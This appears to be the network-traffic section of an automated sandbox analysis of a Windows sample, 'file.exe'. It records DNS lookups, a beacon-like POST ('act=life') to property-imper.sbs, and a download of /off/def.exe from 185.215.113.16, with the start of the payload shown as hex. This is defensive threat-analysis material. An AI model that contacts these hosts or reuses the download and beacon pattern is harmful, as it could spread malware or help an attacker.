                                                                                                                                                                                                Nov 24, 2024 03:04:56.327255011 CET49757443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:56.334489107 CET4434975713.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:56.342123985 CET4434975713.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:56.342173100 CET49757443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:56.342183113 CET4434975713.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:56.342223883 CET4434975713.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:56.342226028 CET49757443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:56.342263937 CET49757443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:56.342437983 CET49757443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:56.342452049 CET4434975713.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:56.916727066 CET44349748172.217.21.36192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:56.916819096 CET44349748172.217.21.36192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:56.917033911 CET49748443192.168.2.5172.217.21.36
                                                                                                                                                                                                Nov 24, 2024 03:04:57.018114090 CET49748443192.168.2.5172.217.21.36
                                                                                                                                                                                                Nov 24, 2024 03:04:57.018137932 CET44349748172.217.21.36192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:05:03.648482084 CET49811443192.168.2.54.175.87.197
                                                                                                                                                                                                Nov 24, 2024 03:05:03.648510933 CET443498114.175.87.197192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:05:03.648582935 CET49811443192.168.2.54.175.87.197
                                                                                                                                                                                                Nov 24, 2024 03:05:03.648960114 CET49811443192.168.2.54.175.87.197
                                                                                                                                                                                                Nov 24, 2024 03:05:03.648972034 CET443498114.175.87.197192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:05:05.568059921 CET443498114.175.87.197192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:05:05.568239927 CET49811443192.168.2.54.175.87.197
                                                                                                                                                                                                Nov 24, 2024 03:05:05.573934078 CET49811443192.168.2.54.175.87.197
                                                                                                                                                                                                Nov 24, 2024 03:05:05.573940992 CET443498114.175.87.197192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:05:05.574222088 CET443498114.175.87.197192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:05:05.589982033 CET49811443192.168.2.54.175.87.197
                                                                                                                                                                                                Nov 24, 2024 03:05:05.631330967 CET443498114.175.87.197192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:05:06.319082975 CET443498114.175.87.197192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:05:06.319106102 CET443498114.175.87.197192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:05:06.319118977 CET443498114.175.87.197192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:05:06.319228888 CET49811443192.168.2.54.175.87.197
                                                                                                                                                                                                Nov 24, 2024 03:05:06.319242001 CET443498114.175.87.197192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:05:06.319299936 CET49811443192.168.2.54.175.87.197
                                                                                                                                                                                                Nov 24, 2024 03:05:06.353223085 CET443498114.175.87.197192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:05:06.353269100 CET443498114.175.87.197192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:05:06.353326082 CET443498114.175.87.197192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:05:06.353559017 CET49811443192.168.2.54.175.87.197
                                                                                                                                                                                                Nov 24, 2024 03:05:06.353656054 CET49811443192.168.2.54.175.87.197
                                                                                                                                                                                                Nov 24, 2024 03:05:06.353672028 CET443498114.175.87.197192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:05:06.353686094 CET49811443192.168.2.54.175.87.197
                                                                                                                                                                                                Nov 24, 2024 03:05:06.353691101 CET443498114.175.87.197192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:05:13.593549967 CET4434976623.1.237.91192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:05:13.593641043 CET49766443192.168.2.523.1.237.91
                                                                                                                                                                                                Nov 24, 2024 03:05:45.451189995 CET49823443192.168.2.5172.217.21.36
                                                                                                                                                                                                Nov 24, 2024 03:05:45.451214075 CET44349823172.217.21.36192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:05:45.451328993 CET49823443192.168.2.5172.217.21.36
                                                                                                                                                                                                Nov 24, 2024 03:05:45.451632977 CET49823443192.168.2.5172.217.21.36
                                                                                                                                                                                                Nov 24, 2024 03:05:45.451647997 CET44349823172.217.21.36192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:05:47.379071951 CET44349823172.217.21.36192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:05:47.379093885 CET44349823172.217.21.36192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:05:47.379163027 CET49823443192.168.2.5172.217.21.36
                                                                                                                                                                                                Nov 24, 2024 03:05:47.379177094 CET44349823172.217.21.36192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:05:47.379221916 CET49823443192.168.2.5172.217.21.36
                                                                                                                                                                                                Nov 24, 2024 03:05:47.381022930 CET49823443192.168.2.5172.217.21.36
                                                                                                                                                                                                Nov 24, 2024 03:05:47.381027937 CET44349823172.217.21.36192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:05:57.082449913 CET44349823172.217.21.36192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:05:57.084104061 CET49823443192.168.2.5172.217.21.36
                                                                                                                                                                                                Nov 24, 2024 03:05:57.248656034 CET49823443192.168.2.5172.217.21.36
                                                                                                                                                                                                Nov 24, 2024 03:05:57.248681068 CET44349823172.217.21.36192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:06:12.387584925 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:06:12.388017893 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:06:12.388092041 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                Nov 24, 2024 03:04:06.302966118 CET5228253192.168.2.51.1.1.1
                                                                                                                                                                                                Nov 24, 2024 03:04:06.739276886 CET53522821.1.1.1192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:41.059298038 CET53572851.1.1.1192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:41.061350107 CET53649131.1.1.1192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:44.209841967 CET53545161.1.1.1192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:45.390309095 CET5494953192.168.2.51.1.1.1
                                                                                                                                                                                                Nov 24, 2024 03:04:45.390496016 CET6493153192.168.2.51.1.1.1
                                                                                                                                                                                                Nov 24, 2024 03:04:45.527084112 CET53549491.1.1.1192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:45.527401924 CET53649311.1.1.1192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:47.617064953 CET5148353192.168.2.51.1.1.1
                                                                                                                                                                                                Nov 24, 2024 03:04:47.617203951 CET5507053192.168.2.51.1.1.1
                                                                                                                                                                                                Nov 24, 2024 03:04:51.115503073 CET5693053192.168.2.51.1.1.1
                                                                                                                                                                                                Nov 24, 2024 03:04:51.115725040 CET5035153192.168.2.51.1.1.1
                                                                                                                                                                                                Nov 24, 2024 03:04:55.946119070 CET6119353192.168.2.51.1.1.1
                                                                                                                                                                                                Nov 24, 2024 03:04:55.946403027 CET5699053192.168.2.51.1.1.1
                                                                                                                                                                                                Nov 24, 2024 03:04:56.005124092 CET53605581.1.1.1192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:05:01.298971891 CET53639141.1.1.1192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:05:20.262660980 CET53542111.1.1.1192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:05:40.840648890 CET53578311.1.1.1192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:05:43.110976934 CET53643241.1.1.1192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:06:11.618949890 CET53540151.1.1.1192.168.2.5
                                                                                                                                                                                                TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                                                                Nov 24, 2024 03:04:41.171139002 CET192.168.2.51.1.1.1c234(Port unreachable)Destination Unreachable
                                                                                                                                                                                                Nov 24, 2024 03:04:59.910182953 CET192.168.2.51.1.1.1c265(Port unreachable)Destination Unreachable
                                                                                                                                                                                                Nov 24, 2024 03:06:10.655576944 CET192.168.2.51.1.1.1c234(Port unreachable)Destination Unreachable
                                                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                Nov 24, 2024 03:04:06.302966118 CET192.168.2.51.1.1.10x694Standard query (0)property-imper.sbsA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 24, 2024 03:04:45.390309095 CET192.168.2.51.1.1.10x708bStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 24, 2024 03:04:45.390496016 CET192.168.2.51.1.1.10xf92cStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                Nov 24, 2024 03:04:47.617064953 CET192.168.2.51.1.1.10x621dStandard query (0)js.monitor.azure.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 24, 2024 03:04:47.617203951 CET192.168.2.51.1.1.10x49ccStandard query (0)js.monitor.azure.com65IN (0x0001)false
                                                                                                                                                                                                Nov 24, 2024 03:04:51.115503073 CET192.168.2.51.1.1.10xa3beStandard query (0)js.monitor.azure.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 24, 2024 03:04:51.115725040 CET192.168.2.51.1.1.10x5d1eStandard query (0)js.monitor.azure.com65IN (0x0001)false
                                                                                                                                                                                                Nov 24, 2024 03:04:55.946119070 CET192.168.2.51.1.1.10x9304Standard query (0)mdec.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 24, 2024 03:04:55.946403027 CET192.168.2.51.1.1.10xb60fStandard query (0)mdec.nelreports.net65IN (0x0001)false
                                                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                Nov 24, 2024 03:04:06.739276886 CET1.1.1.1192.168.2.50x694No error (0)property-imper.sbs104.21.33.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 24, 2024 03:04:06.739276886 CET1.1.1.1192.168.2.50x694No error (0)property-imper.sbs172.67.162.84A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 24, 2024 03:04:45.527084112 CET1.1.1.1192.168.2.50x708bNo error (0)www.google.com172.217.21.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 24, 2024 03:04:45.527401924 CET1.1.1.1192.168.2.50xf92cNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                Nov 24, 2024 03:04:47.753979921 CET1.1.1.1192.168.2.50x16b4No error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                Nov 24, 2024 03:04:47.754100084 CET1.1.1.1192.168.2.50xe6f0No error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                Nov 24, 2024 03:04:47.754100084 CET1.1.1.1192.168.2.50xe6f0No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                Nov 24, 2024 03:04:47.754100084 CET1.1.1.1192.168.2.50xe6f0No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 24, 2024 03:04:48.131125927 CET1.1.1.1192.168.2.50x49ccNo error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                Nov 24, 2024 03:04:48.131125927 CET1.1.1.1192.168.2.50x49ccNo error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                Nov 24, 2024 03:04:48.238462925 CET1.1.1.1192.168.2.50x621dNo error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                Nov 24, 2024 03:04:48.238462925 CET1.1.1.1192.168.2.50x621dNo error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                Nov 24, 2024 03:04:48.238462925 CET1.1.1.1192.168.2.50x621dNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                Nov 24, 2024 03:04:48.238462925 CET1.1.1.1192.168.2.50x621dNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 24, 2024 03:04:50.474942923 CET1.1.1.1192.168.2.50x24d0No error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                Nov 24, 2024 03:04:50.474942923 CET1.1.1.1192.168.2.50x24d0No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                Nov 24, 2024 03:04:50.474942923 CET1.1.1.1192.168.2.50x24d0No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 24, 2024 03:04:50.475295067 CET1.1.1.1192.168.2.50xf7eaNo error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                Nov 24, 2024 03:04:51.253088951 CET1.1.1.1192.168.2.50xa3beNo error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                Nov 24, 2024 03:04:51.253088951 CET1.1.1.1192.168.2.50xa3beNo error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                Nov 24, 2024 03:04:51.253088951 CET1.1.1.1192.168.2.50xa3beNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                Nov 24, 2024 03:04:51.253088951 CET1.1.1.1192.168.2.50xa3beNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 24, 2024 03:04:51.253225088 CET1.1.1.1192.168.2.50x5d1eNo error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                Nov 24, 2024 03:04:51.253225088 CET1.1.1.1192.168.2.50x5d1eNo error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                Nov 24, 2024 03:04:56.181351900 CET1.1.1.1192.168.2.50xb60fNo error (0)mdec.nelreports.netmdec.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                Nov 24, 2024 03:04:56.198137999 CET1.1.1.1192.168.2.50x9304No error (0)mdec.nelreports.netmdec.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                Nov 24, 2024 03:04:59.509495974 CET1.1.1.1192.168.2.50x80eaNo error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                Nov 24, 2024 03:04:59.910087109 CET1.1.1.1192.168.2.50xecf8No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                Nov 24, 2024 03:05:06.748155117 CET1.1.1.1192.168.2.50x9af5No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                Nov 24, 2024 03:05:06.748383045 CET1.1.1.1192.168.2.50x1f4cNo error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                • property-imper.sbs
                                                                                                                                                                                                • otelrules.azureedge.net
                                                                                                                                                                                                • slscr.update.microsoft.com
                                                                                                                                                                                                • fs.microsoft.com
                                                                                                                                                                                                • https:
                                                                                                                                                                                                  • wcpstatic.microsoft.com
                                                                                                                                                                                                  • js.monitor.azure.com
                                                                                                                                                                                                • 185.215.113.16
                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                0192.168.2.549729185.215.113.16802608C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Nov 24, 2024 03:04:28.732249975 CET200OUTGET /off/def.exe HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:30.108242035 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                Date: Sun, 24 Nov 2024 02:04:29 GMT
                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                Content-Length: 2842624
                                                                                                                                                                                                Last-Modified: Sun, 24 Nov 2024 02:00:08 GMT
                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                ETag: "674288a8-2b6000"
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 c0 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 2c 00 00 04 00 00 b6 27 2c 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$+ `@ ,',`Ui` @ @.rsrc`2@.idata 8@heclofms++:@owtxsouk +:+@.taggant@+">+@
                                                                                                                                                                                                Nov 24, 2024 03:04:30.108299017 CET124INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                Nov 24, 2024 03:04:30.108700037 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                Nov 24, 2024 03:04:30.108756065 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                Nov 24, 2024 03:04:30.108768940 CET248INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                Nov 24, 2024 03:04:30.109260082 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                Nov 24, 2024 03:04:30.109289885 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                Nov 24, 2024 03:04:30.109302998 CET248INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                Nov 24, 2024 03:04:30.109535933 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                Nov 24, 2024 03:04:30.109632969 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                Nov 24, 2024 03:04:30.228039980 CET1236INData Raw: 72 1a 34 bd 7d d8 74 70 19 b8 06 b7 38 c9 3e 9c 4f 68 69 88 5c f5 2a c1 cf bb 8b 8b 29 ab f7 cd 3e e6 61 93 dc c6 4a ef 15 cc b3 97 05 c1 4a 9e 5c e8 7d 87 4a 4d 70 7a 03 f8 8f 12 41 da fd 7a 53 e7 56 63 18 f8 92 f2 e0 c3 24 13 41 da fd e8 51 db
                                                                                                                                                                                                Data Ascii: r4}tp8>Ohi\*)>aJJ\}JMpzAzSVc$AQVpq'yRt[5~3ZsnU"7a8dQz(Nzm)39nYNz$C]+^dyo|'1\ jRo\y!@yfR]Yr[wqmI{r


                                                                                                                                                                                                TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                                                                Nov 24, 2024 03:04:31.818645954 CET13.107.246.63443192.168.2.549732CN=*.azureedge.net, O=Microsoft Corporation, L=Redmond, ST=WA, C=US CN=Microsoft Azure RSA TLS Issuing CA 04, O=Microsoft Corporation, C=US CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=USCN=Microsoft Azure RSA TLS Issuing CA 04, O=Microsoft Corporation, C=US CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=USThu Sep 19 17:30:52 CEST 2024 Thu Jun 08 02:00:00 CEST 2023 Thu Aug 01 14:00:00 CEST 2013Sun Sep 14 17:30:52 CEST 2025 Wed Aug 26 01:59:59 CEST 2026 Fri Jan 15 13:00:00 CET 2038771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-16-23-65281,29-23-24,028a2c9bd18a11de089ef85a160da29e4
                                                                                                                                                                                                CN=Microsoft Azure RSA TLS Issuing CA 04, O=Microsoft Corporation, C=USCN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=USThu Jun 08 02:00:00 CEST 2023Wed Aug 26 01:59:59 CEST 2026
                                                                                                                                                                                                CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=USThu Aug 01 14:00:00 CEST 2013Fri Jan 15 13:00:00 CET 2038
                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                0192.168.2.549704104.21.33.1164432608C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-24 02:04:08 UTC265OUTPOST /api HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                Content-Length: 8
                                                                                                                                                                                                Host: property-imper.sbs
                                                                                                                                                                                                2024-11-24 02:04:08 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                Data Ascii: act=life
                                                                                                                                                                                                2024-11-24 02:04:08 UTC1019INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sun, 24 Nov 2024 02:04:08 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Set-Cookie: PHPSESSID=94ivaslbaaut7oquihoushcakp; expires=Wed, 19-Mar-2025 19:50:47 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FYXzAUvv%2FvmBZexP8FC3LOCly8tgZR4YvTvEV9NP9ouEGEuddiV14%2F41mqgpoix3QIyfXkVX%2BGz6SOh4VK4E%2FzN7ISiJ%2B2yn%2B7m6L3J6yd0RqqHySiCFWSY5yO3BbU7hofG7Oes%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                CF-RAY: 8e75d398286e0f65-EWR
                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1621&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=909&delivery_rate=1753753&cwnd=222&unsent_bytes=0&cid=b21b08f987b85eb3&ts=706&x=0"
                                                                                                                                                                                                2024-11-24 02:04:08 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                Data Ascii: 2ok
